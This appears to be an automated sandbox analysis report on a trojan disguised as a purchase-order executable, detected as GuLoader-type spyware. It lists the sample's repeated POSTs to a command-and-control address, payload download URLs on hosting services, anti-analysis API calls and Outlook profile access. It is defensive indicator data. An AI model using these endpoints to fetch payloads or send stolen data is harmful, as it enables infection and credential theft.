              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: unknownDNS traffic detected: queries for: onedrive.live.com
              Source: unknownHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 192Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Feb 2021 07:49:25 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeContent-Length: 15Content-Type: text/htmlData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: PO-A2174679-06.exe, 0000000B.00000002.501778520.0000000000A67000.00000004.00000020.sdmpString found in binary or memory: http://accessasia.com.hk/ovation/five/fre.php
              Source: PO-A2174679-06.exe, 0000000B.00000003.460675918.0000000000AAE000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: PO-A2174679-06.exe, 0000000B.00000003.460675918.0000000000AAE000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
              Source: PO-A2174679-06.exe, 0000000B.00000003.460675918.0000000000AAE000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
              Source: PO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmpString found in binary or memory: http://sinatrasmob.com/pro/ovation_byHOXsph232.bin
              Source: PO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/813514912135380996/813514973141532722/ovation_byHOXsph232.bin
              Source: PO-A2174679-06.exe, 0000000B.00000002.501746377.0000000000A27000.00000004.00000020.sdmpString found in binary or memory: https://hrf0ga.bn.files.1drv.com/
              Source: PO-A2174679-06.exe, 0000000B.00000002.501855027.0000000000A83000.00000004.00000020.sdmp, PO-A2174679-06.exe, 0000000B.00000002.501778520.0000000000A67000.00000004.00000020.sdmpString found in binary or memory: https://hrf0ga.bn.files.1drv.com/y4m5zM3NcSoKRZxp1cr4njUjeP9hX2vmu4HSL4nnw0taslILmJBULwQ1DfMXTHzg-Rs
              Source: PO-A2174679-06.exe, 0000000B.00000002.501746377.0000000000A27000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/
              Source: PO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=B1076D30E2A6430F&resid=B1076D30E2A6430F%21110&authkey=AO3GCQa
              Source: PO-A2174679-06.exe, 0000000B.00000002.501746377.0000000000A27000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/n
              Source: PO-A2174679-06.exe, 00000000.00000002.346109535.000000000073A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess Stats: CPU usage > 98%
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC0699 EnumWindows,NtSetInformationThread,0_2_02BC0699
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC4291 NtSetInformationThread,LdrInitializeThunk,0_2_02BC4291
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC81F3 NtResumeThread,0_2_02BC81F3
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC7B36 NtProtectVirtualMemory,0_2_02BC7B36
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC570F NtSetInformationThread,0_2_02BC570F
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC0977 NtWriteVirtualMemory,TerminateProcess,LdrInitializeThunk,LoadLibraryA,0_2_02BC0977
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC6F5E NtWriteVirtualMemory,0_2_02BC6F5E
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC1AB6 NtSetInformationThread,0_2_02BC1AB6
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC829E NtResumeThread,0_2_02BC829E
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC72EF NtWriteVirtualMemory,0_2_02BC72EF
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC84C5 NtResumeThread,0_2_02BC84C5
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC083A NtSetInformationThread,0_2_02BC083A
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC1A7F NtSetInformationThread,0_2_02BC1A7F
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC446A NtSetInformationThread,NtWriteVirtualMemory,0_2_02BC446A
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC8664 NtWriteVirtualMemory,0_2_02BC8664
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC2DFD NtWriteVirtualMemory,0_2_02BC2DFD
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC6D2D NtSetInformationThread,0_2_02BC6D2D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC3105 NtWriteVirtualMemory,0_2_02BC3105
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC6F06 NtWriteVirtualMemory,0_2_02BC6F06
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC4307 NtSetInformationThread,NtWriteVirtualMemory,LdrInitializeThunk,0_2_02BC4307
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC077C NtSetInformationThread,0_2_02BC077C
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC2F6F NtWriteVirtualMemory,0_2_02BC2F6F
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC8554 NtResumeThread,0_2_02BC8554
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC8150 NtResumeThread,0_2_02BC8150
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC09770_2_02BC0977
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB216511_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB216511_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB216511_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB216511_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB216511_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB216511_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB216511_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB216511_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB216511_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB216511_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB216511_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB216511_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB216511_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB216511_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB216511_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB216511_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB216511_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB216511_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB216511_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB216511_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB216511_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB216511_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB216511_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB216511_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB216511_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D11_3_00AB794D
              Source: PO-A2174679-06.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: PO-A2174679-06.exe, 00000000.00000002.346228693.00000000021F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs PO-A2174679-06.exe
              Source: PO-A2174679-06.exe, 00000000.00000000.231740123.0000000000414000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameyappingextr.exe vs PO-A2174679-06.exe
              Source: PO-A2174679-06.exe, 0000000B.00000002.502209088.0000000002440000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs PO-A2174679-06.exe
              Source: PO-A2174679-06.exe, 0000000B.00000000.344741544.0000000000414000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameyappingextr.exe vs PO-A2174679-06.exe
              Source: PO-A2174679-06.exe, 0000000B.00000002.502225382.0000000002490000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs PO-A2174679-06.exe
              Source: PO-A2174679-06.exeBinary or memory string: OriginalFilenameyappingextr.exe vs PO-A2174679-06.exe
              Source: PO-A2174679-06.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@43/1
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile created: C:\Users\user\AppData\Local\Temp\~DF584B63FBA4AD36AE.TMPJump to behavior
              Source: PO-A2174679-06.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: PO-A2174679-06.exeVirustotal: Detection: 16%
              Source: unknownProcess created: C:\Users\user\Desktop\PO-A2174679-06.exe 'C:\Users\user\Desktop\PO-A2174679-06.exe'
              Source: unknownProcess created: C:\Users\user\Desktop\PO-A2174679-06.exe 'C:\Users\user\Desktop\PO-A2174679-06.exe'
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess created: C:\Users\user\Desktop\PO-A2174679-06.exe 'C:\Users\user\Desktop\PO-A2174679-06.exe' Jump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior

              Data Obfuscation:

              barindex
              Yara detected GuLoaderShow sources
              Source: Yara matchFile source: 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PO-A2174679-06.exe PID: 5424, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PO-A2174679-06.exe PID: 6600, type: MEMORY
              Yara detected VB6 Downloader GenericShow sources
              Source: Yara matchFile source: Process Memory Space: PO-A2174679-06.exe PID: 5424, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PO-A2174679-06.exe PID: 6600, type: MEMORY
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_0040DAC0 push dword ptr [ebp-14h]; ret 0_2_0041096D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_00404856 push edi; retf 0_2_00404857
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_00406411 push edx; ret 0_2_00406412
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_004030D6 pushfd ; retf 0_2_004030DD
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_00403096 pushfd ; retf 0_2_0040309D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC3C9F pushad ; retf 0_2_02BC3CA2
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC3AE6 pushad ; retf 0_2_02BC3AE9
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC3AC2 pushad ; retf 0_2_02BC3AC3
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC3C38 pushad ; retf 0_2_02BC3C3B
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC3C14 pushad ; retf 0_2_02BC3C15
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC5015 pushfd ; retf 0_2_02BC5016
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC3A02 pushad ; retf 0_2_02BC3A05
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC3C7B pushad ; retf 0_2_02BC3C7C
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC3A76 pushad ; retf 0_2_02BC3A79
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC3A52 pushad ; retf 0_2_02BC3A53
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC3B9F pushad ; retf 0_2_02BC3BA0
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC39DE pushad ; retf 0_2_02BC39DF
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC3BC3 pushad ; retf 0_2_02BC3BC6
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC3B2B pushad ; retf 0_2_02BC3B2D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC3B50 pushad ; retf 0_2_02BC3B53
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB818D push ss; ret 11_3_00AB8192
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB818D push ss; ret 11_3_00AB8192
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB818D push ss; ret 11_3_00AB8192
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB818D push ss; ret 11_3_00AB8192
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB818D push ss; ret 11_3_00AB8192
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB818D push ss; ret 11_3_00AB8192
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB818D push ss; ret 11_3_00AB8192
